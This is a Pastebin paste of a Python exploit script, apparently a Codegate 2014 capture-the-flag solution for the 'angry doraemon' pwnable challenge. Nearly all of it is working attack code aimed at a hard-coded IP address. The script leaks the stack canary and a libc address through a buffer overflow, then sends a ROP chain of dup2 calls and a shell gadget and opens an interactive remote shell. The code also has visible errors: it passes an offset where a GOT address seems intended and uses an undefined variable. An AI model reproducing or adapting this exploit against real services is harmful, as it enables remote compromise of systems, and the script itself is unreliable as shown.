Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #-*- coding:utf-8 -*-
- # Codegate 2014 write up by @_g05u_
- # angry doraemon
- # pwnable 250
- # null-life.com
- import re
- import os
- import sys
- import math
- import time
- import struct
- import socket
- HOST = "58.229.183.18"
- PORT = 8888
- #Ubuntu 13.10 x86
- offset_libc_main = 0x19810
- offset_dup2 = 0xE11F0
- got_libc_main = 0x0804B038
- got_write = 0x080486e0
- rop_pop2_ret = 0x080495BE
- exec_sh = 0x08048C62
- canary = "\x00\x8b\xc3\x84"
- def get_socket():
- f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- f.connect((HOST, PORT))
- return f
- def read_logo(s):
- logo = ''
- menu = ''
- while 'Waiting 2 seconds' not in logo:
- logo = s.recv(1024 * 5)
- time.sleep(2.2) #wait 2.2 sec
- while '>' not in menu:
- menu = s.recv(1024)
- def gadget_leer(addr, n):
- data = struct.pack("<I", got_write)
- data += struct.pack("<I", 0x080492c5) #exit return
- data += struct.pack("<I", 0x4) #fd abierto
- data += struct.pack("<I", addr)
- data += struct.pack("<I", n)
- return data
- def get_canary():
- print '[+] get canary '
- s = get_socket()
- read_logo(s)
- s.send('4')
- time.sleep(0.1)
- s.recv(1024) #leer pregunta
- time.sleep(0.1)
- s.send('y'*10)
- time.sleep(0.1)
- mi_opc = s.recv(26) #leer mi opcion
- _canary = mi_opc[22:]
- print '[+] Canary 0x%s' % (''.join(c.encode('hex') for c in _canary))
- return _canary
- def get_rop_shell(libc_base):
- print '[+] dup2 address: %s' % hex(libc_base + offset_dup2)
- data = struct.pack("<I", libc_base + offset_dup2)
- data += struct.pack("<I", rop_pop2_ret)
- data += struct.pack("<I", 4) #fd abierto
- data += struct.pack("<I", 0)
- data += struct.pack("<I", libc_base + offset_dup2)
- data += struct.pack("<I", rop_pop2_ret)
- data += struct.pack("<I", 4) #fd abierto
- data += struct.pack("<I", 1)
- data += struct.pack("<I", libc_base + offset_dup2)
- data += struct.pack("<I", rop_pop2_ret)
- data += struct.pack("<I", 4) #fd abierto
- data += struct.pack("<I", 2)
- data += struct.pack("<I", exec_sh)
- return data
- canary = get_canary()
- print 'Obteniendo libc base'
- #get libc address base
- s = get_socket()
- read_logo(s)
- s.send('4')
- time.sleep(0.1)
- s.recv(1024) #leer pregunta
- time.sleep(0.1)
- s.send('y'*10 + canary + "A"*12 + gadget_leer(offset_libc_main, 4))
- libc_base_address = struct.unpack("<I", s.recv(4))[0] - base_libc_main
- print '[+] Addres libc base: %s' % hex(libc_base_address)
- print 'Lanzando shell'
- #lanzar shell
- rop_shell = get_rop_shell(libc_base_address)
- s = get_socket()
- read_logo(s)
- s.send('4')
- time.sleep(0.1)
- s.recv(1024) #leer pregunta
- time.sleep(0.1)
- s.send('y'*10 + canary + "A"*12 + rop_shell)
- while True:
- sys.stdout.write("$ ")
- sys.stdout.flush()
- c = sys.stdin.readline()
- s.send(c)
- time.sleep(0.5)
- print s.recv(4095)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement